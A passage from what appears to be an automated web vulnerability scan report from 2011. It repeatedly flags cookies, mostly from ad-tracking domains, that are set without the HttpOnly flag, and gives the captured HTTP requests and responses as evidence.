HTTP/1.1 204 No Content Content-Length: 0 Date: Mon, 25 Apr 2011 23:45:19 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 23:45:19 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=69114&c5=166308&c6=&cv=1.3&cj=1&rn=1263260761 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 14:21:10 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 14:21:10 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
_HOP=I=1&TS=1303826034; domain=bing.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: bing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Location: http://www.bing.com/ P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Edge-control: no-store Set-Cookie: _HOP=I=1&TS=1303826034; domain=bing.com; path=/ Date: Tue, 26 Apr 2011 13:53:53 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/p.json?rb=0&gen=1000&gen=100&sid=4db6076013a27c7a&callback=_ate.ad.hrr&pub=xa-4ca0241930358767&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fresources%2Fwebinars%2Fe-commerce%2Fpci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg&9vmo63 HTTP/1.1 Host: cf.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=3; uid=4dab4fa85facd099; uit=1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.comodo.com%2fbusiness-security%2fpci-compliance%2fpci-scan.php HTTP/1.1 Host: cspix.media6degrees.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0e3la00837010i02408; rdrlst=40415xylk60qe00000002370113bolk7p6z0000000137010znmlk346200000003370110poljyxb4000000053701; sglst=2020s0t7ljyxb408rvv00537010i02405ag3ljyxb408rvv00537010i02405; vstcnt=417k010r014uzg6118e1002
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.comodo.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fbusiness-security%2Fpci-compliance%2Fpci-scan.php&scb19p HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X; uid=4dab4fa85facd099
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/firstdataprod/1/H.20.3/s97121651181951?AQB=1&ndh=1&t=25/3/2011%2018%3A46%3A36%201%20300&ns=firstdata&pageName=en_us%3Ahome&g=http%3A//www.firstdata.com/en_us/home&cc=USD&v3=en_us%3Ahome&c50=en_us&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1208&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: firstdata.122.2o7.net Proxy-Connection: keep-alive Referer: http://www.firstdata.com/en_us/home User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: freemarker.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Set-Cookie: sid=o8emesk7arsbpfel9lptqllc70; expires=Wed, 27 Apr 2011 13:03:54 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE" Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 13:03:54 GMT Server: lighttpd Content-Length: 825
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
BIGipServerlct-pool=171237898.38687.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sfga.js HTTP/1.1 Host: lct.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/javascript Date: Tue, 26 Apr 2011 12:40:18 GMT Connection: close Set-Cookie: BIGipServerlct-pool=171237898.38687.0000; path=/ Content-Length: 9247
var _kd = document; var _kdlh = _kd.location.href; var _ki,_kq,_kv; var _kwtlForm; var _kretURL; var _kwtlOnSubmit; var _koid;
function __krand() { return Math.round(Math.random() * 256).toString ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pcha/homepage HTTP/1.1 Host: mydownload.paretologic.safecart.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?epl=6uDg8f0GtTBB04c13Nw5Y2TAIUmQUDhFchd_0fciLHGkFRPIpi8gG4Jpix0wCcvzJ5qDEQahgZLFrI5CphQZUysHDq10em_RGphrcn6kQE3JISFcR16KixcH4xgxowJDrvsks3GX6v1OBwDUozbUpqZpU08RlOkB1IZMbTLURhF1ACAQ3ue_AADgfwUAAECA2wgAAGTAIUlZUyZZQTE2aFpChgAAAPA HTTP/1.1 Host: nuclearpesticide.com Proxy-Connection: keep-alive Referer: http://nuclearpesticide.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: parkinglot=1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1 Host: olui2.fs.ml.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1 Host: pixel.33across.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815
Response
HTTP/1.1 200 OK P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA' Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815; Domain=.33across.com; Expires=Tue, 24-Apr-2012 23:45:34 GMT; Path=/ Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 01-Jan-70 00:00:01 GMT X-33X-Status: 0 Content-Type: image/gif Content-Length: 43 Date: Mon, 25 Apr 2011 23:45:33 GMT Connection: close Server: 33XG1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1 Host: pixel.intellitxt.com Proxy-Connection: keep-alive Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/ Content-Type: text/html Content-Length: 1602 Date: Tue, 26 Apr 2011 14:21:08 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=1431229252;fpan=1;fpa=P0-633902152-1303780517296;ns=0;url=http%3A%2F%2Fwww.slaviks-blog.com%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303780517295;tzo=300;a=p-18-mFEk4J448M;labels=type.wporg HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA
Response
HTTP/1.1 204 No Content Connection: close Set-Cookie: d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Mon, 25-Jul-2011 01:21:18 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Tue, 26 Apr 2011 01:21:18 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/PANscan/ HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>SecurityMe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/determinesaq/reset?resellerid= HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/pricelist.adp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/determinesaq/storechd HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/pricelist.adp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/determinesaq/terminaltype HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/sm/determinesaq/storechd Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 23:44:06 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 0 P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: flashtalkingad1="GUID=12106DCD478E8B";Path=/;Domain=.flashtalking.com;Expires=Wed, 24-Apr-13 23:44:06 GMT pragma: no-cache Location: http://response.firstdata.com/?elqPURLPage=15 Via: 1.1 mdw061001 (MII-APC/1.6) Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /snap_shots.js HTTP/1.1 Host: shots-s.snap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/ HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; session=id%3D750141ed4012a61dd2504f021aabfdfe%26time%3D1303780536%26created_time%3D1303780536%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
